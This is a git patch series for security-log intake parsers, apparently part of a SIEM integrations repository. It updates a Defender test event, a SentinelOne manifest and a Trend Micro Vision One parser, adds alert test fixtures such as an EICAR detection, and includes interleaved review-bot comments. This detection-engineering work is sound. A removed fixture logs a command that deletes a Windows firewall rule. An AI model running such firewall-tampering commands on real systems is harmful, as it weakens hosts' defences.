\"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, 
\"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", "event": { "category": [ "process" 
@@ -19,115 +19,73 @@ "info" ] }, - "@timestamp": "2024-11-08T14:38:51.907372Z", + "@timestamp": "2024-10-22T15:09:44.594155Z", "action": { "properties": { - "AccountSid": "S-1-2-3", - "InitiatingProcessCommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", - "InitiatingProcessFileSize": 145408, - "InitiatingProcessIntegrityLevel": "System", - "InitiatingProcessLogonId": "999", - "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", - "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", - "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer", - "InitiatingProcessVersionInfoInternalFileName": "file", - "InitiatingProcessVersionInfoOriginalFileName": "file.exe", - "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode", - "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880", - "LogonId": "999", - "ProcessIntegrityLevel": "System", - "ProcessTokenElevation": "TokenElevationTypeDefault", - "ProcessVersionInfoCompanyName": "Microsoft Corporation", - "ProcessVersionInfoFileDescription": "Network Command Shell", - "ProcessVersionInfoInternalFileName": "processcommand.exe", - "ProcessVersionInfoOriginalFileName": "processcommand.exe", - "ProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", - "ProcessVersionInfoProductVersion": "10.0.22621.1" + "InitiatingProcessLogonId": "0", + "LogonId": "0" }, "type": "ProcessCreated" }, "file": { - "directory": "C:\\Windows\\processcommand.exe", + "directory": "/usr/bin/ps", "hash": { - "md5": "51a9cac9c4e8da44ffd7502be17604ee", - "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", - "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + "md5": "098f6bcd4621d373cade4e832627b4f6", + "sha1": "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3", + "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" }, - "name": "processcommand.exe", - "size": 82944 + "name": "ps", + "size": 
144632 }, "host": { - "id": "123456789abcdef", - "name": "host.group.local" + "id": "86dd1cf45142e904cb2e99c2721fac3ca198c6ca", + "name": "computer.intranet.example" }, "microsoft": { "defender": { "report": { - "id": "17318" + "id": "67417" } } }, "process": { "args": [ - "HTTP", - "advfirewall", - "delete", - "embedded", - "firewall", - "incoming", - "name=\"program=description=", - "rule", - "server", - "traffic\"" + "--no-headers", + "-A", + "-o", + "comm,pid,pcpu,pmem,rss,etimes" ], - "command_line": "\"processcommand.exe\" advfirewall firewall delete rule name=\"program=description= embedded HTTP server incoming traffic\"", - "name": "processcommand.exe", + "command_line": "/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers", + "name": "ps", "parent": { - "args": [ - "-Embedding", - "ABCDEF0123456789", - "E", - "Global\\HOST0000" - ], "code_signature": { - "status": "Valid", - "subject_name": "OsVendor" + "status": "Unknown", + "subject_name": "Unknown" }, - "command_line": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", - "executable": "c:\\windows\\file.exe", - "hash": { - "md5": "51a9cac9c4e8da44ffd7502be17604ee", - "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", - "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" - }, - "name": "file.exe", - "pid": 10868, - "start": "2024-11-08T14:38:00.674494Z", + "pid": 423627, + "start": "2024-10-22T15:09:44.590000Z", "user": { - "domain": "account domain", - "id": "S-1-2-3", - "name": "syst\u00e8me" - }, - "working_directory": "c:\\windows" + "domain": "computer", + "name": "root" + } }, - "pid": 4520, - "start": "2024-11-08T14:38:51.903048Z", - "working_directory": "C:\\Windows" + "pid": 423627, + "start": "2024-10-22T15:09:44.594155Z", + "working_directory": "/usr/bin" }, "related": { "hash": [ - "44543e0c6f30415c670c1322e61ca68602d58708", - "51a9cac9c4e8da44ffd7502be17604ee", - "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", - 
"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + "098f6bcd4621d373cade4e832627b4f6", + "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08", + "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3" ], "user": [ - "syst\u00e8me" + "root" ] }, "user": { - "domain": "account domain", - "name": "syst\u00e8me" + "domain": "computer", + "name": "root" } } } \ No newline at end of file From a284a656b8d0f342bbdb8a6e70cb8332adc31db6 Mon Sep 17 00:00:00 2001 From: vg-svitla <131353512+vg-svitla@users.noreply.github.com> Date: Thu, 28 Nov 2024 14:14:52 +0200 Subject: [PATCH 294/317] Update SentinelOne/identity/_meta/manifest.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- SentinelOne/identity/_meta/manifest.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/SentinelOne/identity/_meta/manifest.yml b/SentinelOne/identity/_meta/manifest.yml index 33be89396..1d18ad943 100644 --- a/SentinelOne/identity/_meta/manifest.yml +++ b/SentinelOne/identity/_meta/manifest.yml @@ -1,6 +1,6 @@ uuid: b502e522-6996-4b12-9538-f69326b68243 -name: identity -slug: identity +name: SentinelOne Singularity Identity +slug: sentinelone-singularity-identity description: >- SentinelOne Singularity Identity is a cybersecurity solution that provides identity protection and zero-trust security by continuously monitoring and analyzing user behaviors to detect and prevent potential threats. From db978530c9756d0b397b872be52be2cb07b45727 Mon Sep 17 00:00:00 2001 
From: lvoloshyn-sekoia
Date: Thu, 28 Nov 2024 14:58:43 +0200
Subject: [PATCH 295/317] Trend Micro Vision One - improve parser
---
 .../trend-micro-vision-one/_meta/fields.yml | 10 +++
 .../trend-micro-vision-one/ingest/parser.yml | 54 +++++++------
 .../tests/test_eicar_test_file_detection.json | 57 ++++++++++++++
 .../tests/test_information_gathering.json | 76 +++++++++++++++++++
 .../tests/test_internal_network_scanner.json | 1 +
 .../tests/test_process.json | 1 +
 .../tests/test_project_injection.json | 76 +++++++++++++++++++
 .../tests/test_registry.json | 1 +
 .../tests/test_service_abuse.json | 74 ++++++++++++++++++
 9 files changed, 328 insertions(+), 22 deletions(-)
 create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
 create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json
 create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_project_injection.json
 create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json
diff --git a/Trend Micro/trend-micro-vision-one/_meta/fields.yml b/Trend Micro/trend-micro-vision-one/_meta/fields.yml
index f18d3cb5d..2f93f2919 100644
--- a/Trend Micro/trend-micro-vision-one/_meta/fields.yml
+++ b/Trend Micro/trend-micro-vision-one/_meta/fields.yml
@@ -1,3 +1,8 @@
+action.properties.ScriptBlockText:
+ description: ''
+ name: action.properties.ScriptBlockText
+ type: keyword
+
 trendmicro.vision_one.alert_id:
 description: ''
 name: trendmicro.vision_one.alert_id
@@ -8,6 +13,11 @@ trendmicro.vision_one.case_id:
 name: trendmicro.vision_one.case_id
 type: keyword
 
+trendmicro.vision_one.detection_name:
+ description: ''
+ name: trendmicro.vision_one.detection_name
+ type: keyword
+
 trendmicro.vision_one.incident_id:
 description: ''
 name: trendmicro.vision_one.incident_id
diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml
index 09ca7f331..0353bb37b 100644
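Review bot: Both new field declarations leave `description: ''`, so `action.properties.ScriptBlockText` (hunk -1) and `trendmicro.vision_one.detection_name` (hunk -8) enter the intake's field catalogue undocumented. The parser change in this same commit shows where each value comes from, so a one-line description costs nothing: `description: Raw script block content taken from the objectRawDataStr indicator` for the first and `description: Name of the detection taken from the detection_name indicator` for the second. The neighbouring entries also carry empty descriptions, so this follows an existing convention, but new entries are the cheapest place to stop propagating it.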
--- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml @@ -25,12 +25,13 @@ stages: - set: "@timestamp": "{{parsed_event.message.createdDateTime}}" - host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.name }}" - host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.ips }}" + host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.name }}" + host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.ips }}" + host.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.guid }}" - user.email: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'emailAddress') | first).entityValue }}" - container.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityValue }}" - container.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityId }}" + user.email: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'emailAddress') | first).entityValue }}" + container.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'container') | first).entityValue }}" + container.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'container') | first).entityId }}" rule.name: "{{parsed_event.message.model}}" rule.id: "{{parsed_event.message.model.modelId}}" 
@@ -38,7 +39,7 @@ stages: event.url: "{{parsed_event.message.model.workbenchLink}}" - set: - user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}" + user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'account') | first).entityValue }}" - set: user.name: "{{final.user.id.split('\\\\') | last}}" 
@@ -46,18 +47,23 @@ stages: filter: "{{final.user.id != null}}" - set: - process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}" - process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}" - process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}" - process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}" - process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}" - process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}" - process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}" + process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processCmd') | first).value }}" + process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentCmd') | first).value }}" + process.executable: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFilePath') | first).value }}" + process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFilePath') | first).value }}" + process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFileHashSha1') | first).value }}" + process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFileHashSha256') | first).value }}" + + process.parent.pid: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentPid') | first).value }}" + process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'in', ['processPid', 'objectPid']) | first).value }}" 
+ + process.parent.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFileHashSha1') | first).value }}" + process.parent.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFileHashSha256') | first).value }}" - set: - registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[0] }}" - registry.key: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}" - registry.value: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value') | first).value }}" + registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_key') | first).value.split('\\\\')[0] }}" + registry.key: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}" + registry.value: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_value') | first).value }}" registry.path: > {%- set path = [] -%} {%- for indicator in parsed_event.message.indicators -%} 
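Review bot: The new `process.pid` line uses `selectattr('field', 'in', ['processPid', 'objectPid']) | first`, which yields whichever of the two indicators appears first in `parsed_event.message.indicators`, so when an alert carries both the result depends on vendor ordering rather than on a stated preference. The old `file.path` line (replaced in hunk -68) expressed precedence with `or`; if `processPid` should win, the same form does it: `process.pid: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processPid') | first).value or (parsed_event.message.indicators | selectattr('field', '==', 'objectPid') | first).value }}"`. The same ordering dependence applies to the `'in'` selections for `file.hash.sha1` and `file.path` in hunk -68. If the two field names never co-occur in practice, a short comment saying so would spare the next reader the question. The trailing `registry` set block continues past the end of this hunk.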
@@ -68,19 +74,22 @@ stages: {%- endfor -%} {%- if path | length > 0 -%}{{ path | join('\\') }}{%- endif -%} - registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value_data') | first).value }}" + registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_value_data') | first).value }}" - set: registry.data.type: "REG_SZ" filter: "{{final.registry.data.strings != null }}" - set: - file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha1') | first).value }}" - file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha256') | first).value }}" - file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFilePath') | first).value or (parsed_event.message.indicators | selectattr('field', 'equalto', 'filePath') | first).value}}" - file.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'fileName') | first).value }}" + file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'file_sha1') | selectattr('field', 'in', ['fileHash', 'objectFileHashSha1']) | first).value }}" + file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'objectFileHashSha256') | first).value }}" + file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'in', ['objectFilePath', 'fullPath']) | first).value }}" + file.name: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'fileName') | first).value }}" - user.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'logonUser') | first).value }}" + user.name: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'logonUser') | first).value }}" + + - set: + action.properties.ScriptBlockText: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'objectRawDataStr') | first).value }}" - set: 
trendmicro.vision_one.severity: "{{parsed_event.message.severity}}" @@ -89,3 +98,4 @@ stages: trendmicro.vision_one.alert_id: "{{parsed_event.message.id}}" trendmicro.vision_one.status: "{{parsed_event.message.status}}" trendmicro.vision_one.investigation_status: "{{parsed_event.message.investigationStatus}}" + trendmicro.vision_one.detection_name: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'detection_name') | first).value }}" diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json new file mode 100644 index 000000000..5fb30866d --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json 
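Review bot: The new `process.pid` line resolves `selectattr('field', 'in', ['processPid', 'objectPid']) | first` by document order, so when an alert carries both indicators the one the vendor lists first wins, while `process.command_line`, `process.executable` and the hashes on the lines above are always taken from the `process*` indicators; a payload listing `objectPid` first would yield a pid that belongs to a different process than the rest of the `process.*` fields. Preferring the process indicator and falling back to the object one keeps the fields coherent: `process.pid: "{{ (((parsed_event.message.indicators | selectattr('field', '==', 'processPid') | list) or (parsed_event.message.indicators | selectattr('field', '==', 'objectPid') | list)) | first).value }}"`. The same hunk also leaves `file.hash.sha1` and `file.hash.sha256` asymmetric: sha1 now accepts a `fileHash` indicator of type `file_sha1`, but sha256 still matches only `objectFileHashSha256`, so if the vendor emits `fileHash` with type `file_sha256` in the same shape it would be dropped; `file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'file_sha256') | selectattr('field', 'in', ['fileHash', 'objectFileHashSha256']) | first).value }}"` would mirror the sha1 rule. Note that `| first` on an empty selection still leaves `.value` undefined for every one of these lines, so a comment such as `# indicators are optional; unmatched fields stay unset` next to the first `- set:` would help the next reader. The enclosing stage and its `actions:` list begin before this hunk.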
@@ -0,0 +1,57 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": 
\"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, 
\"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": 
[\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Eicar Test File Detection", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-26T16:51:29Z", + "file": { + "hash": { + "sha1": "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8" + }, + "name": "eicar-com.txt", + "path": "C:\\Users\\jdoe\\Downloads\\eicar-com.txt" + }, + "host": { + "id": "ecede9e8-407e-4f34-9747-4a145c247ad5", + "ip": [ + "10.0.0.6" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "related": { + "hash": [ + "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8" + ], + "ip": [ + "10.0.0.6" + ] + }, + "rule": { + "name": "Eicar Test File Detection" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "detection_name": "Eicar_test_1", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json new file mode 100644 index 000000000..4d60422b4 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json 
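Review bot: The new fixture ends without a final newline (`\ No newline at end of file`), and the same applies to test_information_gathering.json in the next hunk; adding the trailing newline keeps the fixtures consistent with the existing test files and avoids a spurious last-line change the next time either file is edited. This fixture exercises the new `fileHash`/`file_sha1` path for `file.hash.sha1` but no added fixture carries a `fileHash` indicator for sha256 or an indicator set where `objectPid` precedes `processPid`, so the precedence behaviour of the parser changes in this commit is not pinned by a test.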
